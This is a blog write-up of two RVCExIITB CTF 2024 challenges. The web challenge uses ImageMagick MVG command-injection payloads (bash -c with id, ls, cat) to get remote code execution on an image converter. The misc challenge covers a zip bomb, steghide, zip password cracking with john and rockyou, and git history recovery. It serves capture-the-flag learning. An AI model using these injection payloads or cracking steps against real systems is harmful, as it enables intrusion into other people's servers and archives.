RVCExIITB CTF 2024 | CTF WRITEUP | WEB

on

RVCExIITB CTF 2024 | CTF WRITEUP | WEB

1. WEB/Transformer

2.MISC/RAW

Category : Web

1) Transformer

I don't really trust other website with my media files. So, I created my own website which allows you to transform your images from one format to another. The website also has a functionality where you can resize your image files to any size that you want (based on your preferred width and height).

Check it out...Its really cool!

http://rvcechalls.xyz:7255/

Description

The task is to exploit the Remote Code Execution (RCE) vulnerability in the image converter program.

Solution

We are given this web page,



We have 2 upload file section here, 1 is for converting to another format and 2nd one is for resizing.

After we upload we are shown this page,

When we click the button we can download the photo in the converted or resized format.

Let's upload and intercept the request in burp and learn its responses.

Very typical usual request and response with no errors.

Let's try to upload a php file.

We got some error in response.

I tried the usual upload file bypass techniques. Nothing worked.Then I searched the given error in ChatGPT to see what does the error mean. 

It turns out the error is from a program called ImageMagick. A quick google search led me to this link: https://book.jorianwoltjer.com/web/imagemagick

I found this payload: 

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost/`id > /tmp/pwned`'
pop graphic-context

Now If I send this payload in the first request and then the following payload in the second request I can view the result of the command executed.

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost/`cat /tmp/pwned`'
pop graphic-context

The payload as it is did not work, so I put this command too from the site,

https://example.com"|bash -c "id > /tmp/pwned' output.png
Making the final payload as: 

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost"|bash -c "ls > /tmp/pwned' output.png'
pop graphic-context

And the payload to view result of command executed.

push graphic-context
viewbox 0 0 640 480
image over 0,0 0,0 'https://localhost"|bash -c "cat /tmp/pwned' output.png'
pop graphic-context

With these we got the following response;

We can see the list of files in the current directory.

Now with this command injection , we just need to move around and find the flag.

We will find the flag file in / dir.

Just print the flag now.


flag{7h3_Tr461ckk_5t0ry_0f_mR_Im4g3_Ma61cKk_3c0b9c0b12f1}

Category: Mics

1) RAW

Your task is to unravel the covert message concealed by a RAW agent. Delve into intercepted communications, analyze an ocean of datadump and decipher the hidden codes to unveil the critical intelligence intended for Indian counterparts. Can you crack the code and reveal the clandestine message? 

Given: Ocean.zip

Solution

Let's unzip the given zip file.

unzip Ocean.zip

No Way!!!...Its a zip bomb..So no use unzipping it like this.

So lets list the files in the zip file and its info,

7z l Ocean.zip

 

We could see alot of files with size 21 and 0, so we could just filter out those.

7z l Ocean.zip | awk '$4 != 21 && $4 != 0'

Lets extract only these files from the zip file with the following command:

7z x Ocean.zip Ocean/chall169/file69 Ocean/chall213/file158 Ocean/chall300/file104 Ocean/chall348/file106 Ocean/chall405/file39 Ocean/chall405/file52 Ocean/chall439/file449 Ocean/chall461/file108

After extracting we go through these steps and we will find a google drive link.

Sign In and download these 2 files.

Open the doc file in any docx viewer. I used google doc itself. Select the whole file content by CTRL + A, we will find a secret key.

KEY - keyishidd3n

I guess this is to use steghide on the given image.

steghide --extract -sf transmission.jpg


We got a secret.txt file. cat it out.

We get this file path:

/d/1hK3tV5PPtdOwUujHOqQOgl1NI015GpNU/

(We had no idea what to do with this for a while and my teammate came up with this way somehow)

https://drive.google.com/uc?id=1hK3tV5PPtdOwUujHOqQOgl1NI015GpNU

When we load this link a zip file is downloaded: agentnotebook.zip

Trying to unzip it shows , its some way encrypted with password.

So we use zip2john to convert to hash to crack it.

sudo zip2john agentnotebook.zip > hash

Now we use john to crack the password.

sudo john hash --format=ZIP --wordlist=/usr/share/wordlists/rockyou.txt

topgun is the password.

unzip the zip file using the following command.

7z x agentnotebook.zip

After unzipping, go to agentnotebook folder and cat the important.txt


HISTORY is all caps means it has something to do with the history of this folder.

Lets list all hidden files too,

ls -la

There is a .git file,Time to use some git skills.

Use git log command to list all commits:

Use this command to go to the previous commit.

git reset --hard HEAD^

Keep doing same till you get the full flag.

flag{th3_j0urn3y_t0_b3_a_R4W_ageNt_i5_n0T_aN_ea5Y_on3}

Check out my teammate's blog for Forensics/Operation Woofenstein

Stay Curious......Keep Learning......!!!!

Happy Hacking!!!!!!

Comments

Post a Comment